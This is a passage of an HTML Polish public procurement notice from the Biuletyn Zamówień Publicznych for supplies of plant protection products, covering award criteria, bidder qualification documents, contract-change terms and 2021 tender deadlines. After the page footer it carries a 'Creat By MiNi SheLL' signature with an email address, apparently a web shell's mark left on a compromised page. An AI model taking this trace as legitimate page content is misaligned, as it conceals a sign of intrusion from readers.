class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">98,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa środków ochrony roślin (herbicydy, zaprawa nasienna, insektycydy). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24440000-0 - Różne nawozy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">98</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia szczególnych warunków w w/w zakresie.<br/>2) Kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to<br/>z odrębnych przepisów.<br/>Zamawiający nie stawia szczególnych warunków w w/w zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie stawia szczególnych warunków w w/w zakresie.<br/>4) Zdolności technicznej lub zawodowej.<br/>a) Posiadają wymaganą wiedzę i doświadczenie, tj. w ciągu trzech ostatnich lat (jeżeli działają<br/>krócej to w tym okresie) wykonali należycie co najmniej dwie umowy, których przedmiot był<br/>tożsamy z przedmiotem niniejszego przetargu (dostawa nasion oraz środków ochrony roślin), a należyte<br/>wykonanie tych umów zostało potwierdzone referencjami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia i dokumenty składane obligatoryjnie wraz z ofertą:<br/>1) oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 uPZP dotyczące przesłanek<br/>wykluczenia z postępowania – załącznik nr 3 do SWZ;<br/>2) oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 uPZP dotyczące spełniania<br/>warunków udziału w postępowaniu – załącznik nr 4 do SWZ.<br/>3) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności<br/>gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca<br/>nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie w<br/>właściwym organem podatkowym w sprawie spłat tych należności wraz ewentualnymi odsetkami lub<br/>grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na<br/>raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;<br/>5) aktualne zaświadczenie właściwej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że<br/>wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne,<br/>wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego<br/>dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie<br/>spłat tych należności wraz ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał<br/>przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub<br/>wstrzymanie w całości wykonania decyzji właściwego organu;<br/>6) Wykonawca, w terminie 3 dni od przekazania informacji, o której mowa w art. 222 ust. 5 uPZP,<br/>przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej<br/>grupy kapitałowej (wzór ujęty w załączniku nr 8 do SWZ). Jeżeli Wykonawca należy do grupy kapitałowej składa również listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów. Wraz ze złożeniem<br/>oświadczenia, wykonawca może przedstawić dowody, że powiązana z innym Wykonawcą nie<br/>prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia;<br/>7) wykaz dostaw potwierdzający spełnianie przez Wykonawcę wymogu udziału w postępowaniu dot.<br/>zdolności technicznej i zawodowej (pkt V.2.4) a) SWZ) (wzór ujęto w załączniku nr 7 do SWZ) wraz z<br/>dokumentami potwierdzającymi należyte wykonanie dostaw (referencje).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia i dokumenty składane obligatoryjnie wraz z ofertą:<br/>1) oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 uPZP dotyczące przesłanek<br/>wykluczenia z postępowania – załącznik nr 3 do SWZ;<br/>2) oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 uPZP dotyczące spełniania<br/>warunków udziału w postępowaniu – załącznik nr 4 do SWZ.<br/>3) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności<br/>gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca<br/>nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie w<br/>właściwym organem podatkowym w sprawie spłat tych należności wraz ewentualnymi odsetkami lub<br/>grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na<br/>raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;<br/>5) aktualne zaświadczenie właściwej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że<br/>wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne,<br/>wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego<br/>dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie<br/>spłat tych należności wraz ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał<br/>przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub<br/>wstrzymanie w całości wykonania decyzji właściwego organu;<br/>6) Wykonawca, w terminie 3 dni od przekazania informacji, o której mowa w art. 222 ust. 5 uPZP,<br/>przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej<br/>grupy kapitałowej (wzór ujęty w załączniku nr 8 do SWZ). Jeżeli Wykonawca należy do grupy kapitałowej składa również listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów. Wraz ze złożeniem<br/>oświadczenia, wykonawca może przedstawić dowody, że powiązana z innym Wykonawcą nie<br/>prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia;<br/>7) wykaz dostaw potwierdzający spełnianie przez Wykonawcę wymogu udziału w postępowaniu dot.<br/>zdolności technicznej i zawodowej (pkt V.2.4) a) SWZ) (wzór ujęto w załączniku nr 7 do SWZ) wraz z<br/>dokumentami potwierdzającymi należyte wykonanie dostaw (referencje).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składające się na ofertę:<br/>1) Wypełniony Formularz Oferty stanowiący załącznik nr 2 do SWZ;<br/>2) Wypełniony formularz cenowy (załącznik nr 6 do SWZ);<br/>3) Stosowne pełnomocnictwo do reprezentowania wykonawcy w przetargu udzielone dla<br/>osoby/osób podpisującej ofertę i wymagane oświadczenia, o ile osoba/osoby składająca i<br/>podpisująca ofertę nie jest ujawniona w wypisie z Krajowego Rejestru Sądowego / informacji z<br/>CEIDG (proponowany wzór pełnomocnictwa stanowi załącznik nr 5 do SWZ);<br/>4) Dokumenty wymienione w pkt VI.1 SWZ;<br/>5) Wszystkie dodatkowe informacje dotyczące zamówienia należy przedstawić w dodatkowym (-<br/>ych) załączniku (-kach) do Formularza Oferty, o ile nie można ich wskazać w formularzu<br/>ofertowym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku zlecenia przez Wykonawcę realizacji części dostaw stanowiących przedmiot<br/>zamówienia, podwykonawca w szczególności musi spełniać następujące warunki:<br/>1) Nie podlegać wykluczeniu na podstawie art. 108 ust. 1 ust. 1 uPZP oraz spełniać warunki<br/>udziału w postępowaniu dotyczące: kompetencji lub uprawnień do prowadzenia określonej<br/>działalności zawodowej, o ile wynika to<br/>z odrębnych przepisów; sytuacji ekonomicznej lub finansowej; zdolności technicznej lub<br/>zawodowej na poziomie nie niższym niż Wykonawca.<br/>2) Przekazać Zamawiającemu potwierdzoną za zgodność z oryginałem kopię umowy z<br/>Wykonawcą, a obowiązki podwykonawcy muszą być co najmniej tożsame z obowiązkami<br/>Wykonawcy względem Zamawiającego uregulowanymi w umowie zawartej w wyniku<br/>rozstrzygnięcia niniejszego postępowania.<br/>3) Uzyskać wyraźną zgodę Zamawiającego przed rozpoczęciem dostaw.<br/>2. Niespełnienie przez Wykonawcę warunków określonych w pkt. 1 uprawnia Zamawiającego do<br/>złożenia zastrzeżeń lub sprzeciwu co do uznania statusu zainteresowanego podmiotu jako<br/>podwykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną<br/>w formie pisemnego aneksu pod rygorem nieważności.<br/>2. Zamawiający dopuszcza zmianę umowy w sprawie zamówienia publicznego w przypadkach<br/>określonych w art. 455 uPZP.<br/>3. Zamawiający dopuszcza zmianę wysokości wynagrodzenia Wykonawcy w ramach umowy<br/>wyłącznie w przypadku, kiedy taka konieczność będzie wynikała ze zmian w obowiązującym<br/>prawie, w szczególności, gdy zmiana prawa prowadzi do zmiany stawki podatku od towarów i<br/>usług; w takim przypadku wynagrodzenie Wykonawcy ulegnie zmianie wyłącznie w zakresie<br/>odpowiadającym zmianie wysokości podatku VAT.<br/>4. Zamawiający dopuszcza zmianę terminu wykonania zamówienia wyłącznie w przypadku<br/>zajścia siły wyższej, w szczególności wystąpienia okoliczności niemożliwych do przewidzenia i<br/>zapobieżenia, powstałych z przyczyn niezależnych od Stron umowy, które uniemożliwiają<br/>terminową realizację zamówienia, a których nie można było przewidzieć na etapie<br/>przeprowadzenia postępowania i zawarcia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma: https://zd-koludawielka.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-07</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com